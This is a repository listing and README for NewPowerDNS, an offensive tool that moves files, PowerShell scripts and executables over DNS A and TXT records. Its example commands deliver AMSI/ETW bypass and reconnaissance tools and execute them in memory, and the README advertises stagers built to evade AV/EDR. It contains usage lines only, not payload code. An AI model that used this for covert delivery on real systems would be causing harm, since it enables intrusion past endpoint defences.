https://github.com/icyguider/NewPowerDNS

Updated version of PowerDNS by @domchell. Adds support for transfers over DNS A records and a few other useful features.
https://github.com/icyguider/NewPowerDNS

Last synced: 21 days ago
JSON representation

Updated version of PowerDNS by @domchell. Adds support for transfers over DNS A records and a few other useful features.

• Host: GitHub
• URL: https://github.com/icyguider/NewPowerDNS
• Owner: icyguider
• License: gpl-3.0
• Created: 2023-03-29T18:43:32.000Z (over 1 year ago)
• Default Branch: main
• Last Pushed: 2023-03-29T18:47:49.000Z (over 1 year ago)
• Last Synced: 2024-11-14T23:10:20.162Z (27 days ago)
• Language: Python
• Size: 17.6 KB
• Stars: 82
• Watchers: 2
• Forks: 9
• Open Issues: 1
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

• awesome-hacking-lists - icyguider/NewPowerDNS - Updated version of PowerDNS by @domchell. Adds support for transfers over DNS A records and a few other useful features. (Python)

README

        
# NewPowerDNS

NewPowerDNS is an updated version of [@domchell's](https://github.com/dmchell) [PowerDNS](https://github.com/mdsecactivebreach/PowerDNS). The main feature added is support for transferring files using DNS A records. See below for a complete list of the modifications made:

- Support for transfer over DNS A records

- Gzip compression to reduce file transfer size

- Support for transferring all types of files

- New stagers that can be easily obfuscated or ran line-by-line to evade being blocked by AV/EDR

- Options to print, exec, or save transferred file

- Update to python3 from python2

The only dependency besides python3 is scapy. It can easily be installed via pip like so:

```

python3 -m pip install scapy

```

See below for a video demonstrating transferring files over both DNS A and TXT records:

## Examples & Usage

Transfer powershell script over DNS A records and print to console:

```

python3 NewPowerDNS.py --file AmSeeETWBP.ps1 --domain sub.domain.com -r A -a print

```

Transfer exe file over DNS TXT records and save to disk:

```

python3 NewPowerDNS.py --file SharpHound.exe --domain sub.domain.com -r TXT -a save

```

Transfer powershell script over DNS TXT records and automatically load into memory:

```

python3 NewPowerDNS.py --file Invoke-Seatbelt.ps1 --domain sub.domain.com -r TXT -a exec

```

General usage:

```

 ___                        ___  _ _  ___

| . \ ___  _ _ _  ___  _ _ | . \| \ |/ __>

|  _// . \| | | |/ ._>| '_>| | ||   |\__ \

|_|  \___/|__/_/ \___.|_|  |___/|_\_|<___/

DNS A Record & updated stager version by @icyguider

        Original version by @domchell

usage: NewPowerDNS.py [-h] [-f ] [-d ] [-a ] [-r ] [-i ]

optional arguments:

  -h, --help            show this help message and exit

  -f , --file 

                        file to transfer

  -d , --domain 

                        domain with auth NS record

  -a , --action 

                        action to perform once data is transferred (options: save, exec, print)

  -r , --record-type 

                        type of DNS record to use for transfer (options: A, TXT) (default: TXT)

  -i , --interface 

                        interface to bind to (default: eth0)

```